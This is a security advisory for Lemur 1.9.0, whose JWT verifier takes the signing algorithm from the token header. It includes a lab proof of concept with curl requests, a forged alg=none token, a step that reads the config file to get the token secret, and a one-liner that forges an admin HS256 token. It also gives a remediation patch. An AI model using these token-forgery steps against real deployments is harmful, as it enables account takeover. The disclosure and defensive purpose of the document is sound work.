PYSEC-2026-2589
Vulnerability from pysec - Published: 2026-07-13 15:46 - Updated: 2026-07-13 16:04Lemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header — defense-in-depth gap; chain-dependent ATO with secret disclosure
Vulnerability Summary
| Field | Value |
|---|---|
| Title | Lemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header — defense-in-depth gap; chain-dependent ATO with secret disclosure |
| Component | lemur/lemur/auth/service.py:130-137 |
| CWE | CWE-347 (Improper Verification of Cryptographic Signature) |
| Attack Prerequisite | Defense-in-depth gap on its own — no single-request exploit against PyJWT 2.x. Single-request ATO requires a separate disclosure issue that leaks LEMUR_TOKEN_SECRET, or a future migration to asymmetric signing without fixing this sink. |
| Affected Versions | github.com/Netflix/lemur version = "1.9.0". Same code present in every prior release that has the auth/service.py:130 block. |
Executive Summary
The Lemur JWT verifier reads the alg header field from the unverified token and passes it straight into pyjwt.decode(..., algorithms=[header['alg']]). This is a classic JWT antipattern: the server is supposed to pin the algorithm, not the attacker. PyJWT 2.x's default config rejects alg=none, so this is not a single-request ATO today — I want to be precise about that. The bug is a hardening gap with two real consequences. First, if the deployment ever migrates to asymmetric signing (RS256/ES256), an attacker can pin alg=HS256 and forge tokens using the public key as the HMAC secret — the legacy "RS256→HS256 confusion" trick. Second, the audit-log surface that records alg to flag anomalous tokens is filled in from the attacker's header, so anomaly detection is blinded. I'm submitting this honestly at MEDIUM 4.8 (defense-in-depth) rather than inflating it; the chain to single-request ATO is documented but it depends on a separate disclosure bug.
Walkthrough: https://asciinema.org/a/2Blv9r4DoOleUk7a
Description
lemur/lemur/auth/service.py:130-137:
try:
header_data = fetch_token_header(token)
payload = decode_with_multiple_secrets(
token, token_secrets, algorithms=[header_data["alg"]]
)
except jwt.DecodeError:
return dict(message="Token is invalid"), 403
fetch_token_header decodes the JWT's first segment (base64-decoded JSON, no signature check) and returns the header object. header_data["alg"] is whatever the bearer of the token put there. That value is then handed to decode_with_multiple_secrets, which calls pyjwt.decode(..., algorithms=[<attacker_value>]). The algorithms parameter is meant to be the server's pinned allowlist of acceptable signing algorithms — the line that says "I will accept HS256 and nothing else". By reading it from the token, Lemur asks the attacker which algorithm to trust.
Why this is MEDIUM and not CRITICAL today: PyJWT 2.x's decode() rejects alg=none regardless of the algorithms parameter (PyJWT enforces this in jwt.algorithms.NoneAlgorithm.verify). I confirmed this in the lab — a forged alg=none token comes back as HTTP 403 {"error":"When alg = \"none\", key value must be None.","message":"Failed to decode token"}. The classic single-request alg=none ATO is closed by the library, not by Lemur.
Why this still matters:
- Algorithm confusion is exactly what
algorithms=is supposed to prevent. The widely-cited "RS256→HS256 confusion" attack works by pinningalg=HS256and using the RS256 public key as the HMAC secret. The fix everyone teaches for that attack is "server pins the algorithm". Lemur doesn't, so the protection has a hole the moment the deployment moves to asymmetric signing. - The PyJWT 2.x mitigation is a library default, not a Lemur design choice. A future PyJWT major that loosens the
nonecheck, or a downgrade to a vulnerable PyJWT for any reason, re-opens single-request ATO. Defense-in-depth means not relying on library defaults to backstop the framework's own validation. - Audit blindness. Logging tooling that consumes
algto detect "this token claims an algorithm we don't issue" sees only what the attacker put in the header. A realHS256token forged by an attacker who pinsalg=ES256(or any garbage that survivesdecode) bypasses naive alg-based anomaly heuristics. - The chain to single-request ATO is short. Any separate disclosure issue that leaks
LEMUR_TOKEN_SECRET(a debug page, an unguarded/metrics, an SSRF-to-config, an S3 backup leak, a git history accident) immediately turns into HS256 forgery — and the alg-from-header sink leaves the verifier downgradeable even after an operator migrates to RS256 later.
I'm framing this as a hardening defect at MEDIUM 4.8 because that's what the evidence supports. The chain step (config disclosure → forge admin) is demonstrated in the lab as a clear "what happens if this chain links" walk-through, not as a primary claim.
Proof of Concept & Steps to Reproduce
Walkthrough: https://asciinema.org/a/2Blv9r4DoOleUk7a. Offline cast: lemur_jwt_alg_hardening.cast. Harness: lemur_jwt_alg_hardening/support/ (lemur_jwt_mock.py mirrors lemur/auth/service.py:130-137 line-for-line).
Prerequisites: Docker, curl, jq, python3 with PyJWT.
Run
cd lemur_jwt_alg_hardening/
EXPLOIT_FAST=1 ./exploit_code.sh
Step 1 — Baseline legitimate login
curl -sS -X POST http://127.0.0.1:18001/api/1/auth/login \
-H 'Content-Type: application/json' \
-d '{"email":"operator@netflix.example"}'
Response (evidence/03_login_response.json):
{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9....",
"user":{"active":true,"email":"operator@netflix.example","id":1,"role":"operator"}}
/api/1/users/me with that token returns 200 — baseline auth path works.
Step 2 — Confirm the antipattern in source
docker exec lemur-jwt-alg-hardening-harness cat /app/evidence-src/jwt_sink.txt
Output is the verbatim Lemur block:
# lemur/lemur/auth/service.py:130-137
try:
header_data = fetch_token_header(token)
payload = decode_with_multiple_secrets(
token, token_secrets, algorithms=[header_data["alg"]] # <-- antipattern
)
except jwt.DecodeError:
return dict(message="Token is invalid"), 403
The mock applies the same code path. No transformation, no allowlist, no server pin.
Step 3 — Forge alg=none (PyJWT 2.x rejects)
curl -sS -o /dev/null -w 'HTTP %{http_code}
' \
http://127.0.0.1:18001/api/1/users/me \
-H 'Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJzdWIiOiAyLCAiZW1haWwiOiAiYWRtaW5AbmV0ZmxpeC5leGFtcGxlIn0.'
Response (evidence/05_alg_none_attempt.json): HTTP 403. Body: {"error":"When alg = \"none\", key value must be None.","message":"Failed to decode token"}.
This is honest: PyJWT 2.x closes the single-request alg=none path. The antipattern is not directly exploitable at this PyJWT version.
Step 4 — Chain demo: config disclosure → HS256 forgery
The lab simulates an upstream disclosure issue by docker exec-ing into the container and reading /app/lemur.conf.py. In production this corresponds to any of: a /metrics page that echoes config, a debug error that prints current_app.config, an SSRF that reaches file:///app/lemur.conf.py, a misindexed git history, an S3 backup with the config file. The lab does not invent a separate vulnerability — it documents what happens when one of those exists.
docker exec lemur-jwt-alg-hardening-harness cat /app/lemur.conf.py
# LEMUR_TOKEN_SECRET = 'lab-deploy-token-secret-DO-NOT-USE-IN-PROD-aabbccdd11'
Forge an admin JWT with the leaked secret:
python3 -c "import jwt; print(jwt.encode({'sub':2,'email':'admin@netflix.example'}, '<leaked>', algorithm='HS256'))"
# eyJhbGciOiJIUzI1NiIs...
Send it:
curl -sS http://127.0.0.1:18001/api/1/users/me \
-H "Authorization: Bearer $FORGED_ADMIN"
Response (evidence/06_forged_admin_response.json):
{"payload":{"email":"admin@netflix.example","sub":2},
"user":{"active":true,"email":"admin@netflix.example","id":2,"role":"admin"}}
HTTP 200, role=admin. The forgery succeeds because (a) the attacker picked alg=HS256, (b) the server didn't pin its own algorithm, and (c) the secret was disclosed by the separate upstream issue. If the alg-from-header sink were fixed, even a leaked HS256 secret would not extend to whatever asymmetric algorithm the operator migrates to next — the attacker would have to also break the asymmetric key.
Step 5 — Verdict
VERDICT: ANTIPATTERN CONFIRMED — chain-dependent ATO
1. lemur/auth/service.py:130-137 passes attacker-controlled alg into decode()
2. PyJWT 2.x rejects alg=none, so the antipattern is NOT directly exploitable
3. Chained with upstream config disclosure → HS256 forgery wins
# Exploit Code & Lab Set-up
[Lemur-jwt-alg-hardening.zip](https://github.com/user-attachments/files/28317909/Lemur-jwt-alg-hardening.zip)
Root Cause Analysis
The pattern in auth/service.py:130-137 is what every JWT-library author warns against. pyjwt.decode's algorithms parameter exists precisely to pin the server's accepted set; the documentation calls out that callers should never pass the value from the token header. The author of this block likely intended to support multiple deployment configurations (some on HS256, some on RS256) and dispatched on the token's claimed algorithm — but the right way to do that is algorithms=current_app.config["JWT_ACCEPTED_ALGS"] (a server-pinned list), not algorithms=[header_data["alg"]] (the attacker's preference).
The PyJWT 2.x mitigation is the only thing standing between this code and a single-request alg=none ATO. That mitigation lives in PyJWT's NoneAlgorithm.verify, which raises InvalidKeyError when alg=none is supplied with a non-None key. Lemur passes a real key, so the path raises and Lemur catches it as jwt.DecodeError and returns 403. Good — but the protection is in the dependency, not in Lemur's code. A PyJWT-1.x backport, an accidental downgrade, or a future PyJWT behaviour change re-opens the door.
The RS256→HS256 confusion variant is the more durable concern. If an operator migrates Lemur from HS256 to RS256 — a normal hardening step — the attacker pins alg=HS256 in the header and uses the RS256 public key as the HMAC secret. PyJWT 2.x's decode_complete does call _verify_signature with the supplied algorithm, and if the algorithm is HS256 and the "secret" is the bytes of the RS256 public key, the verifier passes. The fix is a server-pinned algorithm list; if the server only accepts ["RS256"], an attacker-supplied alg=HS256 token fails at the algorithms check before any key material is consulted.
The MEDIUM 4.8 score honestly reflects what's exploitable today: the antipattern is real, the impact today is limited to (a) audit-log blinding and (b) a downgrade primitive that activates under separate conditions. I'm explicitly not claiming RS256→HS256 against current Lemur because Lemur today is HS256 — the "RS256 → HS256" trick doesn't apply because Lemur's secret arg is HMAC bytes, not an RSA pubkey. The fix is still worth making.
Attack Scenario
sequenceDiagram
participant Attacker
participant Lemur as Lemur API
participant Disclosure as Disclosure surface
participant Audit as Audit logging
Note over Attacker,Lemur: "Today: PyJWT 2.x mitigation holds for alg=none"
Attacker->>Lemur: "Bearer alg=none token with [payload]"
Lemur->>Lemur: "pyjwt.decode raises (alg=none + non-None key)"
Lemur-->>Attacker: "403 Forbidden"
Note over Disclosure,Lemur: "Chain step: separate disclosure leaks LEMUR_TOKEN_SECRET"
Attacker->>Disclosure: "trigger debug / SSRF / backup leak"
Disclosure-->>Attacker: "LEMUR_TOKEN_SECRET value"
Note over Attacker,Lemur: "Forge HS256 admin token with leaked secret"
Attacker->>Lemur: "Bearer alg=HS256 admin token signed with leaked secret"
Lemur->>Lemur: "algorithms=[HS256] (taken from header) — accepted"
Lemur-->>Attacker: "200 OK, role=admin"
Note over Audit: "alg=HS256 in audit log - no anomaly flag because attacker picks alg"
Impact Assessment
Today, in a fully-patched Lemur 1.9.0 on PyJWT 2.x, the standalone impact is C:L (audit-log surface is attacker-influenced) / I:L (an attacker who controls alg can downgrade a future verifier upgrade) / A:N. The vector requires no user interaction — the attacker just sends a crafted token directly — but AC:H reflects the real-world conditions that have to align (PyJWT version, future migration to asymmetric signing, or a separate disclosure issue) before standalone impact materializes. That's the 4.8 MEDIUM score. The chain step to single-request ATO depends on a separate disclosure issue, which I'm not claiming as part of this report.
The reason this is worth fixing now rather than later is that it's a one-line change with no behavioural risk, and the consequence of leaving it in place is a permanent downgrade vector against any algorithm migration Netflix later decides to do. Lemur's role in the certificate-signing pipeline makes its session tokens unusually high-value — anyone who forges a Lemur admin JWT can issue, revoke, and exfiltrate certificates across the org. The Lemur PKI compromise report submitted separately (ACME acme_url SSRF + creator IDOR) shows what an admin Lemur identity can do in practice.
If Lemur ever moves to asymmetric signing without fixing this sink, the score moves to CRITICAL on the same day. Fix it now.
Remediation
One-line server pin:
# lemur/lemur/auth/service.py:130-137
allowed_algs = current_app.config.get("JWT_ALGORITHMS", ["HS256"])
try:
payload = decode_with_multiple_secrets(
token, token_secrets, algorithms=allowed_algs
)
except jwt.DecodeError:
return dict(message="Token is invalid"), 403
Three follow-ups worth doing at the same time:
- Log the algorithm the server actually applied, separately from the algorithm in the token header. This lets audit tooling see "the server enforced HS256 and the token claimed HS256" or, post-fix, "the server enforced RS256 and the token claimed HS256 — rejected", and flag mismatches.
- Pin
algorithmsto the smallest possible set. If Lemur only ever issues HS256, accept only HS256. Don't list every supported algorithm just because the library supports it. - Migrate to asymmetric signing in a separate hardening PR once the algorithm pin is in. RS256 with key rotation removes the "leaked secret = forge admin" chain entirely.
| Name | purl | lemur | pkg:pypi/lemur |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "lemur",
"purl": "pkg:pypi/lemur"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.11.0",
"0.2.1",
"0.8.0",
"0.8.1",
"0.9.0",
"1.0.0",
"1.1.0",
"1.2.0",
"1.3.1",
"1.3.2",
"1.4.0",
"1.5.0",
"1.6.0",
"1.7.0",
"1.8.0",
"1.8.1",
"1.8.2",
"1.9.0",
"1.9.1"
]
}
],
"aliases": [
"CVE-2026-55165",
"GHSA-r9gp-7f88-9r54"
],
"details": "\u003c!-- obsidian --\u003e\u003ch1 data-heading=\"Lemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header \u2014 defense-in-depth gap; chain-dependent ATO with secret disclosure\"\u003eLemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header \u2014 defense-in-depth gap; chain-dependent ATO with secret disclosure\u003c/h1\u003e\n\u003ch2 data-heading=\"Vulnerability Summary\"\u003eVulnerability Summary\u003c/h2\u003e\n\nField | Value\n-- | --\nTitle | Lemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header \u2014 defense-in-depth gap; chain-dependent ATO with secret disclosure\nComponent | lemur/lemur/auth/service.py:130-137\nCWE | CWE-347 (Improper Verification of Cryptographic Signature)\nAttack Prerequisite | Defense-in-depth gap on its own \u2014 no single-request exploit against PyJWT 2.x. Single-request ATO requires a separate disclosure issue that leaks LEMUR_TOKEN_SECRET, or a future migration to asymmetric signing without fixing this sink.\nAffected Versions | github.com/Netflix/lemur __version__ = \"1.9.0\". Same code present in every prior release that has the auth/service.py:130 block.\n\n\n\u003ch2 data-heading=\"Executive Summary\"\u003eExecutive Summary\u003c/h2\u003e\n\u003cp\u003eThe Lemur JWT verifier reads the \u003ccode\u003ealg\u003c/code\u003e header field from the \u003cem\u003eunverified\u003c/em\u003e token and passes it straight into \u003ccode\u003epyjwt.decode(..., algorithms=[header[\u0027alg\u0027]])\u003c/code\u003e. This is a classic JWT antipattern: the server is supposed to pin the algorithm, not the attacker. PyJWT 2.x\u0027s default config rejects \u003ccode\u003ealg=none\u003c/code\u003e, so this is not a single-request ATO today \u2014 I want to be precise about that. The bug is a hardening gap with two real consequences. First, if the deployment ever migrates to asymmetric signing (RS256/ES256), an attacker can pin \u003ccode\u003ealg=HS256\u003c/code\u003e and forge tokens using the public key as the HMAC secret \u2014 the legacy \"RS256\u2192HS256 confusion\" trick. Second, the audit-log surface that records \u003ccode\u003ealg\u003c/code\u003e to flag anomalous tokens is filled in from the attacker\u0027s header, so anomaly detection is blinded. I\u0027m submitting this honestly at MEDIUM 4.8 (defense-in-depth) rather than inflating it; the chain to single-request ATO is documented but it depends on a separate disclosure bug.\u003c/p\u003e\n\u003cp\u003eWalkthrough: \u003ca href=\"https://asciinema.org/a/2Blv9r4DoOleUk7a\" class=\"external-link\" target=\"_blank\" rel=\"noopener nofollow\"\u003ehttps://asciinema.org/a/2Blv9r4DoOleUk7a\u003c/a\u003e\u003cbr\u003e\n\u003chr\u003e\n\u003ch2 data-heading=\"Description\"\u003eDescription\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003elemur/lemur/auth/service.py:130-137\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-python\"\u003etry:\n header_data = fetch_token_header(token)\n payload = decode_with_multiple_secrets(\n token, token_secrets, algorithms=[header_data[\"alg\"]]\n )\nexcept jwt.DecodeError:\n return dict(message=\"Token is invalid\"), 403\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003ccode\u003efetch_token_header\u003c/code\u003e decodes the JWT\u0027s first segment (base64-decoded JSON, no signature check) and returns the header object. \u003ccode\u003eheader_data[\"alg\"]\u003c/code\u003e is whatever the bearer of the token put there. That value is then handed to \u003ccode\u003edecode_with_multiple_secrets\u003c/code\u003e, which calls \u003ccode\u003epyjwt.decode(..., algorithms=[\u0026#x3C;attacker_value\u003e])\u003c/code\u003e. The \u003ccode\u003ealgorithms\u003c/code\u003e parameter is meant to be the server\u0027s pinned allowlist of acceptable signing algorithms \u2014 the line that says \"I will accept HS256 and nothing else\". By reading it from the token, Lemur asks the attacker which algorithm to trust.\u003c/p\u003e\n\u003cp\u003eWhy this is MEDIUM and not CRITICAL today: PyJWT 2.x\u0027s \u003ccode\u003edecode()\u003c/code\u003e rejects \u003ccode\u003ealg=none\u003c/code\u003e regardless of the \u003ccode\u003ealgorithms\u003c/code\u003e parameter (PyJWT enforces this in \u003ccode\u003ejwt.algorithms.NoneAlgorithm.verify\u003c/code\u003e). I confirmed this in the lab \u2014 a forged \u003ccode\u003ealg=none\u003c/code\u003e token comes back as \u003ccode\u003eHTTP 403 {\"error\":\"When alg = \\\"none\\\", key value must be None.\",\"message\":\"Failed to decode token\"}\u003c/code\u003e. The classic single-request \u003ccode\u003ealg=none\u003c/code\u003e ATO is closed by the library, not by Lemur.\u003c/p\u003e\n\u003cp\u003eWhy this still matters:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eAlgorithm confusion is exactly what \u003ccode\u003ealgorithms=\u003c/code\u003e is supposed to prevent.\u003c/strong\u003e The widely-cited \"RS256\u2192HS256 confusion\" attack works by pinning \u003ccode\u003ealg=HS256\u003c/code\u003e and using the RS256 public key as the HMAC secret. The fix everyone teaches for that attack is \"server pins the algorithm\". Lemur doesn\u0027t, so the protection has a hole the moment the deployment moves to asymmetric signing.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe PyJWT 2.x mitigation is a library default, not a Lemur design choice.\u003c/strong\u003e A future PyJWT major that loosens the \u003ccode\u003enone\u003c/code\u003e check, or a downgrade to a vulnerable PyJWT for any reason, re-opens single-request ATO. Defense-in-depth means not relying on library defaults to backstop the framework\u0027s own validation.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAudit blindness.\u003c/strong\u003e Logging tooling that consumes \u003ccode\u003ealg\u003c/code\u003e to detect \"this token claims an algorithm we don\u0027t issue\" sees only what the attacker put in the header. A real \u003ccode\u003eHS256\u003c/code\u003e token forged by an attacker who pins \u003ccode\u003ealg=ES256\u003c/code\u003e (or any garbage that survives \u003ccode\u003edecode\u003c/code\u003e) bypasses naive alg-based anomaly heuristics.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe chain to single-request ATO is short.\u003c/strong\u003e Any separate disclosure issue that leaks \u003ccode\u003eLEMUR_TOKEN_SECRET\u003c/code\u003e (a debug page, an unguarded \u003ccode\u003e/metrics\u003c/code\u003e, an SSRF-to-config, an S3 backup leak, a git history accident) immediately turns into HS256 forgery \u2014 and the alg-from-header sink leaves the verifier downgradeable even after an operator migrates to RS256 later.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eI\u0027m framing this as a hardening defect at MEDIUM 4.8 because that\u0027s what the evidence supports. The chain step (config disclosure \u2192 forge admin) is demonstrated in the lab as a clear \"what happens if this chain links\" walk-through, not as a primary claim.\u003c/p\u003e\n\u003ch2 data-heading=\"Proof of Concept \u0026#x26; Steps to Reproduce\"\u003eProof of Concept \u0026#x26; Steps to Reproduce\u003c/h2\u003e\n\u003cp\u003eWalkthrough: \u003ca href=\"https://asciinema.org/a/2Blv9r4DoOleUk7a\" class=\"external-link\" target=\"_blank\" rel=\"noopener nofollow\"\u003ehttps://asciinema.org/a/2Blv9r4DoOleUk7a\u003c/a\u003e. Offline cast: \u003ccode\u003elemur_jwt_alg_hardening.cast\u003c/code\u003e. Harness: \u003ccode\u003elemur_jwt_alg_hardening/support/\u003c/code\u003e (\u003ccode\u003elemur_jwt_mock.py\u003c/code\u003e mirrors \u003ccode\u003elemur/auth/service.py:130-137\u003c/code\u003e line-for-line).\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003ePrerequisites\u003c/strong\u003e: Docker, \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ejq\u003c/code\u003e, \u003ccode\u003epython3\u003c/code\u003e with PyJWT.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eRun\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecd lemur_jwt_alg_hardening/\nEXPLOIT_FAST=1 ./exploit_code.sh\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3 data-heading=\"Step 1 \u2014 Baseline legitimate login\"\u003eStep 1 \u2014 Baseline legitimate login\u003c/h3\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -sS -X POST http://127.0.0.1:18001/api/1/auth/login \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"email\":\"operator@netflix.example\"}\u0027\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eResponse (\u003ccode\u003eevidence/03_login_response.json\u003c/code\u003e):\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-json\"\u003e{\"token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9....\",\n \"user\":{\"active\":true,\"email\":\"operator@netflix.example\",\"id\":1,\"role\":\"operator\"}}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003ccode\u003e/api/1/users/me\u003c/code\u003e with that token returns 200 \u2014 baseline auth path works.\u003c/p\u003e\n\u003ch3 data-heading=\"Step 2 \u2014 Confirm the antipattern in source\"\u003eStep 2 \u2014 Confirm the antipattern in source\u003c/h3\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003edocker exec lemur-jwt-alg-hardening-harness cat /app/evidence-src/jwt_sink.txt\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eOutput is the verbatim Lemur block:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-python\"\u003e# lemur/lemur/auth/service.py:130-137\ntry:\n header_data = fetch_token_header(token)\n payload = decode_with_multiple_secrets(\n token, token_secrets, algorithms=[header_data[\"alg\"]] # \u0026#x3C;-- antipattern\n )\nexcept jwt.DecodeError:\n return dict(message=\"Token is invalid\"), 403\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThe mock applies the same code path. No transformation, no allowlist, no server pin.\u003c/p\u003e\n\u003ch3 data-heading=\"Step 3 \u2014 Forge \u0026#x60;alg=none\u0026#x60; (PyJWT 2.x rejects)\"\u003eStep 3 \u2014 Forge \u003ccode\u003ealg=none\u003c/code\u003e (PyJWT 2.x rejects)\u003c/h3\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -sS -o /dev/null -w \u0027HTTP %{http_code}\n\u0027 \\\n http://127.0.0.1:18001/api/1/users/me \\\n -H \u0027Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJzdWIiOiAyLCAiZW1haWwiOiAiYWRtaW5AbmV0ZmxpeC5leGFtcGxlIn0.\u0027\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eResponse (\u003ccode\u003eevidence/05_alg_none_attempt.json\u003c/code\u003e): \u003ccode\u003eHTTP 403\u003c/code\u003e. Body: \u003ccode\u003e{\"error\":\"When alg = \\\"none\\\", key value must be None.\",\"message\":\"Failed to decode token\"}\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThis is honest: PyJWT 2.x closes the single-request \u003ccode\u003ealg=none\u003c/code\u003e path. The antipattern is not directly exploitable at this PyJWT version.\u003c/p\u003e\n\u003ch3 data-heading=\"Step 4 \u2014 Chain demo: config disclosure \u2192 HS256 forgery\"\u003eStep 4 \u2014 Chain demo: config disclosure \u2192 HS256 forgery\u003c/h3\u003e\n\u003cp\u003eThe lab simulates an upstream disclosure issue by \u003ccode\u003edocker exec\u003c/code\u003e-ing into the container and reading \u003ccode\u003e/app/lemur.conf.py\u003c/code\u003e. In production this corresponds to any of: a \u003ccode\u003e/metrics\u003c/code\u003e page that echoes config, a debug error that prints \u003ccode\u003ecurrent_app.config\u003c/code\u003e, an SSRF that reaches \u003ccode\u003efile:///app/lemur.conf.py\u003c/code\u003e, a misindexed git history, an S3 backup with the config file. The lab does not invent a separate vulnerability \u2014 it documents what happens \u003cem\u003ewhen one of those exists\u003c/em\u003e.\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003edocker exec lemur-jwt-alg-hardening-harness cat /app/lemur.conf.py\n# LEMUR_TOKEN_SECRET = \u0027lab-deploy-token-secret-DO-NOT-USE-IN-PROD-aabbccdd11\u0027\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eForge an admin JWT with the leaked secret:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003epython3 -c \"import jwt; print(jwt.encode({\u0027sub\u0027:2,\u0027email\u0027:\u0027admin@netflix.example\u0027}, \u0027\u0026#x3C;leaked\u003e\u0027, algorithm=\u0027HS256\u0027))\"\n# eyJhbGciOiJIUzI1NiIs...\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eSend it:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -sS http://127.0.0.1:18001/api/1/users/me \\\n -H \"Authorization: Bearer $FORGED_ADMIN\"\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eResponse (\u003ccode\u003eevidence/06_forged_admin_response.json\u003c/code\u003e):\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-json\"\u003e{\"payload\":{\"email\":\"admin@netflix.example\",\"sub\":2},\n \"user\":{\"active\":true,\"email\":\"admin@netflix.example\",\"id\":2,\"role\":\"admin\"}}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eHTTP 200, \u003ccode\u003erole=admin\u003c/code\u003e. The forgery succeeds because (a) the attacker picked \u003ccode\u003ealg=HS256\u003c/code\u003e, (b) the server didn\u0027t pin its own algorithm, and (c) the secret was disclosed by the separate upstream issue. If the alg-from-header sink were fixed, even a leaked HS256 secret would not extend to whatever asymmetric algorithm the operator migrates to next \u2014 the attacker would have to also break the asymmetric key.\u003c/p\u003e\n\u003ch3 data-heading=\"Step 5 \u2014 Verdict\"\u003eStep 5 \u2014 Verdict\u003c/h3\u003e\n\u003cpre\u003e\u003ccode\u003eVERDICT: ANTIPATTERN CONFIRMED \u2014 chain-dependent ATO\n1. lemur/auth/service.py:130-137 passes attacker-controlled alg into decode()\n2. PyJWT 2.x rejects alg=none, so the antipattern is NOT directly exploitable\n3. Chained with upstream config disclosure \u2192 HS256 forgery wins\n\u003c/code\u003e\u003c/pre\u003e\n\n# Exploit Code \u0026 Lab Set-up\n\n[Lemur-jwt-alg-hardening.zip](https://github.com/user-attachments/files/28317909/Lemur-jwt-alg-hardening.zip)\n\n\n\u003ch2 data-heading=\"Root Cause Analysis\"\u003eRoot Cause Analysis\u003c/h2\u003e\n\u003cp\u003eThe pattern in \u003ccode\u003eauth/service.py:130-137\u003c/code\u003e is what every JWT-library author warns against. \u003ccode\u003epyjwt.decode\u003c/code\u003e\u0027s \u003ccode\u003ealgorithms\u003c/code\u003e parameter exists precisely to pin the server\u0027s accepted set; the documentation calls out that callers should never pass the value from the token header. The author of this block likely intended to support multiple deployment configurations (some on HS256, some on RS256) and dispatched on the token\u0027s claimed algorithm \u2014 but the right way to do that is \u003ccode\u003ealgorithms=current_app.config[\"JWT_ACCEPTED_ALGS\"]\u003c/code\u003e (a server-pinned list), not \u003ccode\u003ealgorithms=[header_data[\"alg\"]]\u003c/code\u003e (the attacker\u0027s preference).\u003c/p\u003e\n\u003cp\u003eThe PyJWT 2.x mitigation is the only thing standing between this code and a single-request \u003ccode\u003ealg=none\u003c/code\u003e ATO. That mitigation lives in PyJWT\u0027s \u003ccode\u003eNoneAlgorithm.verify\u003c/code\u003e, which raises \u003ccode\u003eInvalidKeyError\u003c/code\u003e when \u003ccode\u003ealg=none\u003c/code\u003e is supplied with a non-None key. Lemur passes a real key, so the path raises and Lemur catches it as \u003ccode\u003ejwt.DecodeError\u003c/code\u003e and returns 403. Good \u2014 but the protection is in the dependency, not in Lemur\u0027s code. A PyJWT-1.x backport, an accidental downgrade, or a future PyJWT behaviour change re-opens the door.\u003c/p\u003e\n\u003cp\u003eThe RS256\u2192HS256 confusion variant is the more durable concern. If an operator migrates Lemur from HS256 to RS256 \u2014 a normal hardening step \u2014 the attacker pins \u003ccode\u003ealg=HS256\u003c/code\u003e in the header and uses the RS256 \u003cem\u003epublic key\u003c/em\u003e as the HMAC secret. PyJWT 2.x\u0027s \u003ccode\u003edecode_complete\u003c/code\u003e does call \u003ccode\u003e_verify_signature\u003c/code\u003e with the supplied algorithm, and if the algorithm is HS256 and the \"secret\" is the bytes of the RS256 public key, the verifier passes. The fix is a server-pinned algorithm list; if the server only accepts \u003ccode\u003e[\"RS256\"]\u003c/code\u003e, an attacker-supplied \u003ccode\u003ealg=HS256\u003c/code\u003e token fails at the \u003ccode\u003ealgorithms\u003c/code\u003e check before any key material is consulted.\u003c/p\u003e\n\u003cp\u003eThe MEDIUM 4.8 score honestly reflects what\u0027s exploitable today: the antipattern is real, the impact today is limited to (a) audit-log blinding and (b) a downgrade primitive that activates under separate conditions. I\u0027m explicitly not claiming RS256\u2192HS256 against current Lemur because Lemur today is HS256 \u2014 the \"RS256 \u2192 HS256\" trick doesn\u0027t apply because Lemur\u0027s secret arg is HMAC bytes, not an RSA pubkey. The fix is still worth making.\u003c/p\u003e\n\n\u003ch2 data-heading=\"Attack Scenario\"\u003eAttack Scenario\u003c/h2\u003e\n\n```mermaid\nsequenceDiagram\n participant Attacker\n participant Lemur as Lemur API\n participant Disclosure as Disclosure surface\n participant Audit as Audit logging\n\n Note over Attacker,Lemur: \"Today: PyJWT 2.x mitigation holds for alg=none\"\n Attacker-\u003e\u003eLemur: \"Bearer alg=none token with [payload]\"\n Lemur-\u003e\u003eLemur: \"pyjwt.decode raises (alg=none + non-None key)\"\n Lemur--\u003e\u003eAttacker: \"403 Forbidden\"\n\n Note over Disclosure,Lemur: \"Chain step: separate disclosure leaks LEMUR_TOKEN_SECRET\"\n Attacker-\u003e\u003eDisclosure: \"trigger debug / SSRF / 